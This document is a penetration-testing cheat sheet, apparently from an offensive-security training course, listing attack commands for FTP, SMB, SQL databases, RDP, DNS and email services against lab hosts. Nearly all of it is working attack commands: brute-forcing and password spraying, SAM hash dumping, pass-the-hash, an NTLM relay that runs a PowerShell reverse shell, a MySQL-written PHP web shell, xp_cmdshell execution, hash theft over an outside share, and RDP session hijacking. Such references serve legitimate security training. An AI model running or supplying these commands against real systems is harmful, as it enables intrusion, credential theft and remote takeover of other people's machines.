Services
Attacking FTP
Command
Description
ftp 192.168.2.142
Connecting to the FTP server using the ftp
client.
nc -v 192.168.2.142 21
Connecting to the FTP server using netcat
.
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142
Brute-forcing the FTP service.
Attacking SMB
Command
Description
smbclient -N -L //10.129.14.128
Null-session testing against the SMB service.
smbmap -H 10.129.14.128
Network share enumeration using smbmap
.
smbmap -H 10.129.14.128 -r notes
Recursive network share enumeration using smbmap
.
smbmap -H 10.129.14.128 --download "notes\note.txt"
Download a specific file from the shared folder.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
Upload a specific file to the shared folder.
rpcclient -U'%' 10.10.110.17
Null-session with the rpcclient
.
./enum4linux-ng.py 10.10.11.45 -A -C
Automated enumeratition of the SMB service using enum4linux-ng
.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'
Password spraying against different users from a list.
impacket-psexec administrator:'Password123!'@10.10.110.17
Connect to the SMB service using the impacket-psexec
.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
Execute a command over the SMB service using crackmapexec
.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Enumerating Logged-on users.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
Extract hashes from the SAM database.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
Use the Pass-The-Hash technique to authenticate on the target host.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
Dump the SAM database using impacket-ntlmrelayx
.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>
Execute a PowerShell based reverse shell using impacket-ntlmrelayx
.
Attacking SQL Databases
Command
Description
mysql -u julio -pPassword123 -h 10.129.20.13
Connecting to the MySQL server.
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30
Connecting to the MSSQL server.
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
Connecting to the MSSQL server from Linux.
sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h
Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server.
mysql> SHOW DATABASES;
Show all available databases in MySQL.
mysql> USE htbusers;
Select a specific database in MySQL.
mysql> SHOW TABLES;
Show all available tables in the selected database in MySQL.
mysql> SELECT * FROM users;
Select all available entries from the "users" table in MySQL.
sqlcmd> SELECT name FROM master.dbo.sysdatabases
Show all available databases in MSSQL.
sqlcmd> USE htbusers
Select a specific database in MSSQL.
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES
Show all available tables in the selected database in MSSQL.
sqlcmd> SELECT * FROM users
Select all available entries from the "users" table in MSSQL.
sqlcmd> EXECUTE sp_configure 'show advanced options', 1
To allow advanced options to be changed.
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1
To enable the xp_cmdshell.
sqlcmd> RECONFIGURE
To be used after each sp_configure command to apply the changes.
sqlcmd> xp_cmdshell 'whoami'
Execute a system command from MSSQL server.
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'
Create a file using MySQL.
mysql> show variables like "secure_file_priv";
Check if the the secure file privileges are empty to read locally stored files on the system.
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Read local files in MSSQL.
mysql> select LOAD_FILE("/etc/passwd");
Read local files in MySQL.
sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'
Hash stealing using the xp_dirtree
command in MSSQL.
sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'
Hash stealing using the xp_subdirs
command in MSSQL.
sqlcmd> SELECT srvname, isremote FROM sysservers
Identify linked servers in MSSQL.
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
Identify the user and its privileges used for the remote connection in MSSQL.
Attacking RDP
Command
Description
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Password spraying against the RDP service.
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
Brute-forcing the RDP service.
rdesktop -u admin -p password123 192.168.2.143
Connect to the RDP service using rdesktop
in Linux.
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
Impersonate a user without its password.
net start sessionhijack
Execute the RDP session hijack.
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Enable "Restricted Admin Mode" on the target Windows host.
xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA
Use the Pass-The-Hash technique to login on the target host without a password.
Attacking DNS
Command
Description
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
Perform an AXFR zone transfer attempt against a specific name server.
subfinder -d inlanefreight.com -v
Brute-forcing subdomains.
host support.inlanefreight.com
DNS lookup for the specified subdomain.
Attacking Email Services
Command
Description
host -t MX microsoft.com
DNS lookup for mail servers for the specified domain.
dig mx inlanefreight.com | grep "MX" | grep -v ";"
DNS lookup for mail servers for the specified domain.
host -t A mail1.inlanefreight.htb.
DNS lookup of the IPv4 address for the specified subdomain.
telnet 10.10.110.20 25
Connect to the SMTP server.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
SMTP user enumeration using the RCPT command against the specified host.
python3 o365spray.py --validate --domain msplaintext.xyz
Verify the usage of Office365 for the specified domain.
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
Enumerate existing users using Office365 on the specified domain.
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
Password spraying against a list of users that use Office365 for the specified domain.
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
Brute-forcing the POP3 service.
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213
Testing the SMTP service for the open-relay vulnerability.
Last updated